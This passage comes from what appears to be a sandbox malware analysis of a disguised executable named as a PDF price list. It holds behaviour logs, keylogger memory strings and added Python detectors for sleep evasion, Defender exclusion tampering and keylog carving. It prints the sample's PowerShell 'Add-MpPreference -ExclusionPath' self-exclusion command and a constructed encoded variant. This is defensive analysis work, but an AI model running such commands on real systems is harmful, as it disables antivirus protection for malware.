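    r"Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2400000Jump to behavior",
    r"Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399883Jump to behavior",
    r"Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394391s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
]

# The report runs the source path straight into the behaviour text and appends the
# UI link text "Jump to behavior"; the regex undoes both.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)(?:\s+TID:\s*(?P<tid>\d+))?"
    r"(?P<kind>Thread delayed|Thread sleep time|WMI Queries):?\s*"
    r"(?P<detail>.*?)(?:Jump to behavior)?$"
)
DELAY_RE = re.compile(r"delay time:\s*(\d+)")
SLEEP_RE = re.compile(r"(-?\d+)s")   # "-2394391s": same magnitude as the ms values in the delay lines


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = {"src": m["src"], "tid": m["tid"], "kind": m["kind"], "detail": m["detail"].strip()}
    if ev["kind"] == "Thread delayed":
        ev["ms"] = int(DELAY_RE.search(ev["detail"]).group(1))
    elif ev["kind"] == "Thread sleep time":
        ev["ms"] = abs(int(SLEEP_RE.search(ev["detail"]).group(1)))
    else:
        ev["wmi_class"] = next((c for c in VM_CLASSES if c in ev["detail"]), None)
    return ev


def summarize(lines):
    """Per source process: longest single wait, finite re-arms, infinite waits, VM probes."""
    out = defaultdict(lambda: {"max_single_ms": 0, "delay_calls": 0,
                               "infinite_waits": 0, "wmi_vm_classes": set()})
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        s = out[ev["src"]]
        if "ms" in ev:
            if ev["ms"] >= TIMESPAN_MAX_MS:
                s["infinite_waits"] += 1
            else:
                # Consecutive values (2400000, 2399883, ...) are one wait re-armed with the
                # remaining time, so the maximum, not the sum, estimates the real stall.
                s["delay_calls"] += 1
                s["max_single_ms"] = max(s["max_single_ms"], ev["ms"])
        elif ev.get("wmi_class"):
            s["wmi_vm_classes"].add(ev["wmi_class"])
    return dict(out)


def verdict(summary):
    flags = {}
    for src, s in summary.items():
        f = []
        if s["max_single_ms"] >= LONG_SLEEP_MS:
            f.append(f"long sleep (>= 3 min): {s['max_single_ms'] / 60000:.1f} min")
        if s["infinite_waits"]:
            f.append("TimeSpan.MaxValue wait")
        if s["wmi_vm_classes"]:
            f.append("hardware WMI probe: " + ", ".join(sorted(s["wmi_vm_classes"])))
        flags[src] = f
    return flags


if __name__ == "__main__":
    for src, f in verdict(summarize(SAMPLE_LINES)).items():
        print(src, "->", "; ".join(f) or "nothing flagged")
```

Run against the full evidence list, both the dropper and the ctsdvwT.exe persistence copy come out with a 40-minute stall plus an infinite wait and a BaseBoard/Processor probe; a sandbox whose run budget is shorter than the stall never reaches the credential theft, which is the point of the delay.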

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q8<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}THcq N
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q?<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}rTHcq N
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q3<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR^q
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q><b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}THcq N
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q9<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}rTHcq N
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.00000000029FD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Time: 12/05/2024 07:06:34<br>User Name: user<br>Computer Name: 675052<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}r
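The PowerShell child above is the sample carving itself out of Windows Defender: `Add-MpPreference -ExclusionPath` pointed at its own image. The command line names System32, but the created process lives in SysWOW64 because the 32-bit dropper's path is redirected by WoW64 file-system redirection; that mismatch between command line and image path is itself a useful hunting pivot. The detection below is an added example for this page, not a Sigma rule or vendor code: it takes process-creation records (the field names follow Sysmon Event ID 1 and are an assumption), unwraps `-EncodedCommand` when the cmdlet is hidden behind base64 UTF-16LE, extracts every exclusion argument, and rates an exclusion that covers the parent process's own image or directory as a self-exclusion. The first event reproduces the command line recorded above; the other two are constructed for the example.

```python
"""Detect Defender exclusion tampering in PowerShell process-creation events.

Added example for this report, not Joe Sandbox or Microsoft code. Field names
follow Sysmon Event ID 1 (assumption); SAMPLE_EVENTS[0] reproduces the command
line in the report above, the other events are constructed.
"""
import base64
import re


def encode_ps(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {   # from the report: the dropper excludes its own image
        "ParentImage": r"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
                       r'-ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"',
    },
    {   # constructed: the persistence copy excluding its directory, hidden behind -enc
        "ParentImage": r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -enc "
                       + encode_ps(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ctsdvwT"'),
    },
    {   # constructed: read-only query, must not fire
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Unrestricted Get-MpPreference",
    },
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the common ones are listed.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MP_RE = re.compile(r"\b(?P<verb>Add|Set)-MpPreference\b(?P<args>.*)", re.I | re.S)
EXCL_RE = re.compile(
    r"-Exclusion(?P<kind>Path|Process|Extension)\s+"
    r"(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)'|(?P<bare>\S+))", re.I)
RTP_RE = re.compile(r"-DisableRealtimeMonitoring\s+(?:\$true|1)\b", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # an -e... switch that was not really base64 UTF-16LE


def covers(excluded: str, image: str) -> bool:
    """True if the exclusion names the image itself or a directory above it."""
    e = excluded.lower().rstrip("\\")
    i = image.lower()
    return bool(i) and (i == e or i.startswith(e + "\\"))


def classify(event: dict) -> list:
    decoded = decode_encoded_command(event["CommandLine"])
    script = decoded if decoded is not None else event["CommandLine"]
    mp = MP_RE.search(script)
    if not mp:
        return []
    parent = event.get("ParentImage", "")
    base = {"verb": mp["verb"], "parent": parent, "encoded": decoded is not None}
    findings = []
    for ex in EXCL_RE.finditer(mp["args"]):
        value = ex["dq"] or ex["sq"] or ex["bare"]
        findings.append({**base, "kind": ex["kind"], "value": value,
                         "self_exclusion": covers(value, parent)})
    if RTP_RE.search(mp["args"]):
        findings.append({**base, "kind": "RealtimeMonitoring", "value": "disabled",
                         "self_exclusion": False})
    return findings


def scan(events) -> list:
    return [f for ev in events for f in classify(ev)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        sev = "HIGH" if f["self_exclusion"] else "MEDIUM"
        print(f"{sev}: {f['verb']}-MpPreference -Exclusion{f['kind']} {f['value']!r} "
              f"(encoded={f['encoded']}) from {f['parent']}")
```

On a suspect host, `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists what was added and `Remove-MpPreference -ExclusionPath <path>` reverts it; Defender also records the configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which corroborates the process-creation telemetry when command-line logging is incomplete.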
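The memory strings above are the keylog buffer the sample keeps before exfiltration: a system-profile header (Time, User Name, Computer Name, OSFullName, CPU, RAM) closed by `<hr>`, then one record per foreground window in the form `<b>[ title]</b> (dd/MM/yyyy HH:mm:ss)<br>` followed by the keystrokes, with non-printing keys written in braces such as `{Win}` (here `{Win}r`, the Win+R Run-dialog shortcut, captured twice). The parser below is an added example written for this page, not the malware's code or a vendor tool: it carves header and records out of a raw dumped string, ignoring the junk that precedes them in a memory dump (`$^q8` and the like above), and tokenises the keystrokes so brace-delimited keys stay distinct from typed characters. The second record in the sample is constructed for the example; its `{Tab}` and `{Enter}` tokens assume the same brace convention as the `{Win}` seen in the dump.

```python
"""Carve keylog records of the form seen in the dumped strings above.

Added example for this report, not the malware's code. SAMPLE_DUMP combines
strings copied from the report with one constructed record (marked).
"""
import re
from collections import Counter

SAMPLE_DUMP = (
    "$^q8"                                       # junk preceding the string in the memory dump
    "Time: 12/05/2024 07:06:34<br>User Name: user<br>Computer Name: 675052<br>"
    "OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>"
    "RAM: 8191.25 MB<br><hr>"
    "<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}r"
    # constructed record: assumes {Tab}/{Enter} follow the same brace convention as {Win}
    "<b>[ Sign in - Google Chrome]</b> (26/09/2024 19:23:01)<br>alice@example.com{Tab}hunter2{Enter}"
)

PROFILE_FIELDS = ("Time", "User Name", "Computer Name", "OSFullName", "CPU", "RAM")
HEADER_RE = re.compile(r"Time: .*?<hr>", re.S)
RECORD_RE = re.compile(
    r"<b>\[\s*(?P<title>[^\]]*)\]</b>\s*\((?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\)<br>"
    r"(?P<keys>.*?)(?=<b>\[|$)", re.S)
TOKEN_RE = re.compile(r"\{[A-Za-z0-9]+\}|.", re.S)   # "{Win}" is one token, "r" is another


def parse_profile(blob: str) -> dict:
    """Victim profile from the header, or {} when the dump holds only records."""
    m = HEADER_RE.search(blob)
    if not m:
        return {}
    profile = {}
    for part in m.group(0)[:-len("<hr>")].split("<br>"):
        key, sep, value = part.partition(": ")
        if sep and key in PROFILE_FIELDS:
            profile[key] = value.strip()
    return profile


def tokenize(keys: str) -> list:
    return TOKEN_RE.findall(keys)


def parse_records(blob: str) -> list:
    """Every window record in the blob, regardless of what precedes it."""
    return [{"window": m["title"].strip(), "time": m["ts"], "keys": tokenize(m["keys"])}
            for m in RECORD_RE.finditer(blob)]


def typed_text(record: dict) -> str:
    """Keystrokes rendered for a timeline: brace tokens kept verbatim, characters joined."""
    return "".join(record["keys"])


def special_keys(record: dict) -> Counter:
    """How often each brace-delimited key appears, e.g. {'{Win}': 2}."""
    return Counter(t for t in record["keys"] if t.startswith("{"))


def parse_dump(blob: str):
    return parse_profile(blob), parse_records(blob)


if __name__ == "__main__":
    profile, records = parse_dump(SAMPLE_DUMP)
    print("victim:", profile)
    for r in records:
        print(f"{r['time']}  [{r['window']}]  {typed_text(r)}  {dict(special_keys(r))}")
```

Strings carved from process memory are often cut off or followed by unrelated bytes, as in the `{Win}THcq N` fragments above, so the tail of the last record in any single string should be treated as unreliable; the header, when present, is the more stable artefact and ties the buffer to a specific victim host.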
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
